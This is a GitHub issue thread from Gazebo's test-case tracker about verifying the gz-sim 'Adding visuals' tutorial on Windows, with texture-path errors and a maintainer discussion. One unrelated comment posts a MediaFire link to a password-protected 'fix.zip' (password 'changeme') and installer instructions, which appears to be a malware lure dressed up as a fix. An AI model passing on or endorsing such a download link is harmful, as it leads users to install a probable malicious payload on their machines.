gazebosim/gazebo_test_cases #1126: gz-sim: Adding visuals

azeey-test, 2024-08-29:
## Configuration

* os: Windows

## Links

* [Live](https://gazebosim.org/api/sim/9/adding_visuals.html)
* [Source](https://github.com/gazebosim/gz-sim/tree/gz-sim9/tutorials/adding_visuals.md)

## Process

    
            
### Step 1 - Instructions work
            
        

    
    

    

    
    
            
### Step 2 - Images (if there are any) match the result

Kudjo-Grand, 2024-08-29:
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

knmcguire, 2024-09-13:
I'll work on this now on windows 11

knmcguire, 2024-09-13:
Got errors ❌ 

In one terminal:
```
gz sim -s models\my_turtle\model.sdf
```
in another:
```
gz sim -g
```
I get in the second terminal the following error message:

```
DynamicFactory(): Unable to parse descriptor set from [C:/Users/kimbe/Development/simulation/gazebo/gz-ws/install\share\gz\protos\gz-msgs11.gz_desc]
(2024-09-13 11:22:29.545) [error] [SystemPaths.cc:455] [GUI] Could not resolve file [../materials/textures/Turtle_BaseColor.png]
(2024-09-13 11:22:29.545) [error] [Material.cc:176] [GUI] Unable to find texture [../materials/textures/Turtle_BaseColor.png] as a locally cached texture or in path [C:\Users\kimbe\Development\simulation\gazebo\gazebo_models\models\my_turtle]
```

If I add the model in GZ_SIM_RESOURCE_PATH I can see it in resource spawner though...

knmcguire, 2024-09-13:
It seems to be an issue with the .dae file. It can't handle the .. to go one folder back.... so it's better to put in there the full path apparently

azeey, 2024-09-13:
It would be nice if the texture file resolution would fine files relative to the same file instead of the current working directory. Mind filing this issue in gz-common? 

Is the tutorial okay though given that it instructs running with a full path?  I.e should we go ahead and close this issue?

knmcguire, 2024-09-14:
You can go ahead and close this issue. About making an issue in gz-commons, I'd like to have something that is reproduceable but I won't be near a computer for the next week.  So I'll work on it once I'm back.

Double dots should work on windows so it's strange that it doesn't!

closed 2024-09-16 by iche033